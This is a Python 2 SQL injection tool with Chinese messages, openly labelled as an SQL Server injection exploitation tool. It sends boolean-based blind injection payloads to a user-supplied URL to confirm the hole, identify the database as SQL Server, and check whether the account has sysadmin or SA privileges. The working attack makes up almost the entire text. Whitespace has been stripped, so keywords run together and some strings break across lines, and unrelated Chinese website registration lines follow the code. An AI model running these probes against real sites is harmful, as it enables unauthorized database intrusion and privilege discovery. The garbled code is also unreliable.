# Code by zhaoxiaobu Email: little.bu@hotmail.com
#-*- coding: UTF-8 -*-
fromsysimportexit
fromurllibimporturlopen
fromstringimportjoin,strip
fromreimportsearch
defis_sqlable():
sql1="%20and%201=2"
sql2="%20and%201=1"
urlfile1=urlopen(url+sql1)
urlfile2=urlopen(url+sql2)
htmlcodes1=urlfile1.read()
htmlcodes2=urlfile2.read()
ifnotsearch(judge,htmlcodes1)andsearch(judge,htmlcodes2):
print"[信息]恭喜!這個URL是有注入漏洞的!n"
print"[信息]現在判斷數據庫是否是
SQL Server,請耐心等候....."
else:
print"[錯誤]你確定這個URL能用?換個別的試試吧!n"
sql="%20and%20exists%20(select%20*%20from%20sysobjects)"
urlfile=urlopen(url+sql)
htmlcodes=urlfile.read()
ifnotsearch(judge,htmlcodes):
print"[錯誤]數據庫好像不是
SQL Server的!n"
else:
print"[信息]確認是
SQL Server數據庫!n"
print"[信息]開始檢測當前數據庫用戶權限,請耐心等待......"
is_sysadmin()
defis_sysadmin():
sql="%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))"
urlfile=urlopen(url+sql)
htmlcodes=urlfile.read()
ifnotsearch(judge,htmlcodes):
print"[錯誤]當前數據庫用戶不具有sysadmin權限!n"
else:
print"[信息]當前數據庫用戶具有sysadmin權限!n"
print"[信息]檢測當前用戶是不是SA,請耐心等待......"
is_sa()
defis_sa():
sql="%20and%20'sa'=(select%20System_user)";
urlfile=urlopen(url+sql)
htmlcodes=urlfile.read()
ifnotsearch(judge,htmlcodes):
print"[錯誤]當前數據庫用戶不是SA!n"
else:
print"[信息]當前數據庫用戶是SA!n"
print"n########################################################################n"
print" ^o^
SQL Server注入利用工具^o^ "
print" Email: little.bu@hotmail.comn"
print"========================================================================";
url=raw_input('[信息]請輸入一個可能有注入漏洞的鏈接!nURL:')
ifurl=='':
print"[錯誤]提供的URL必須具有 '.asp?xxx=' 這樣的格式"
exit(1)
judge=raw_input("[信息]請提供一個判斷字符串.n判斷字符串:")
ifjudge=='':
print"[錯誤]判斷字符串不能為空!"
exit(1)
is_sqlable()
京公網安備 11010802034615號
經營許可證編號:京B2-20210330
